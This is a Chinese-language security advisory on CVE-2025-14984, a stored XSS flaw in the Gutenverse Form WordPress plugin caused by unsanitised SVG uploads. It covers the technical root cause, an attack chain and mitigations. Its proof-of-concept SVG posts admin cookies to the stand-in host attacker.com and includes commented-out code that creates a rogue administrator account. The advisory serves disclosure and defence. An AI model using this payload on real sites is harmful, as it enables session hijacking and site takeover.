CVE-2025-14984: Gutenverse Form插件SVG上传存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14984

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Gutenverse Form (WordPress插件)

漏洞概述

Gutenverse Form是WordPress的一个流行表单构建插件，广泛用于创建各种联系表单、调查问卷和用户注册表单。该插件在2.3.2及之前的所有版本中存在一个严重的存储型跨站脚本(XSS)漏洞。漏洞的根本原因在于插件的框架组件通过WordPress的upload_mimes过滤器将SVG文件格式添加到允许上传的MIME类型列表中，但并未实现对SVG文件内容的任何安全清理或消毒措施。SVG文件格式本身支持内联JavaScript代码，这意味着攻击者可以构造包含恶意JavaScript payload的SVG文件并上传到服务器。由于该漏洞允许存储型XSS攻击，任何访问或查看该SVG文件的用户都会在其浏览器上下文中执行攻击者植入的恶意脚本，可能导致会话劫持、敏感数据窃取、管理后台权限提升等严重后果。攻击者只需要拥有WordPress网站的Author级别（作者）权限即可实施攻击，这在多用户博客或协作编辑环境中尤其危险。

技术细节

该漏洞的技术根源在于Gutenverse Form插件框架组件中的文件上传处理逻辑。具体来说，插件通过以下代码路径将SVG添加到允许的MIME类型：调用upload_mimes过滤器钩子，将'image/svg'和'image/svg+xml'添加到WordPress允许的文件上传类型白名单中。然而，插件在处理SVG文件上传时缺少关键的安全验证步骤。首先，插件没有对SVG文件内容进行XML解析和恶意脚本检测；其次，没有使用DOMPurify等专业库对SVG中的JavaScript进行清理或移除；最后，缺少Content-Disposition头的正确设置来防止浏览器将SVG作为可执行脚本处理。攻击者可以构造如下SVG payload：包含<script>标签或SVG特有的事件处理器（如onload、onerror）来执行任意JavaScript代码。由于SVG文件通常会被WordPress存储在wp-content/uploads目录下，并通过直接URL访问，当受害者（包括管理员）访问这些SVG文件时，浏览器会解析SVG并执行其中的恶意脚本。攻击者可以利用此漏洞窃取管理员的认证cookies、创建新的管理员账户、或在网站前端注入恶意内容。

攻击链分析

STEP 1

1

攻击者获取WordPress网站的Author级别或更高权限账户

STEP 2

2

攻击者构造包含恶意JavaScript代码的SVG文件（如使用<script>标签或SVG事件处理器onload/onerror）

STEP 3

3

攻击者通过Gutenverse Form插件的SVG文件上传功能上传恶意SVG文件

STEP 4

4

插件验证MIME类型为image/svg+xml后允许上传，未进行内容安全检查

STEP 5

5

恶意SVG文件被存储在wp-content/uploads目录中

STEP 6

6

受害者（管理员或其他用户）访问该SVG文件的URL

STEP 7

7

浏览器解析SVG文件并执行其中的恶意JavaScript代码

STEP 8

8

攻击者通过JavaScript执行窃取会话cookie、创建后门账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <script type="text/javascript"> // Steal admin cookies and send to attacker-controlled endpoint var cookies = document.cookie; var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://attacker.com/collect', true); xhr.send('cookies=' + encodeURIComponent(cookies)); // Alternative: Create admin account via WordPress REST API // fetch('/wp-json/wp/v2/users', { // method: 'POST', // headers: { // 'Content-Type': 'application/json', // 'X-WP-Nonce': nonce // Requires nonce enumeration // }, // body: JSON.stringify({ // username: 'hacked_admin', // email: '[email protected]', // roles: ['administrator'] // }) // }); // Display alert for demonstration purposes console.log('XSS Payload Executed - CVE-2025-14984'); </script> <rect width="100%" height="100%" fill="#f0f0f0"/> <text x="50%" y="50%" text-anchor="middle">Malicious SVG File</text> </svg>

影响范围

Gutenverse Form插件 <= 2.3.2（所有版本）

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：首先，通过自定义WordPress插件或主题的upload_mimes过滤器，移除SVG MIME类型的注册；其次，在Nginx配置中添加规则阻止.svg文件的直接访问（location ~* \.svg$ { deny all; }）；第三，修改.htaccess文件限制uploads目录下SVG文件的执行权限；第四，暂时禁用Gutenverse Form插件的文件上传功能；最后，增强网站的内容安全策略(CSP)，防止内联脚本执行。建议立即对所有已上传的SVG文件进行安全检查，删除可疑文件，并通知可能受影响的管理员重置会话凭证。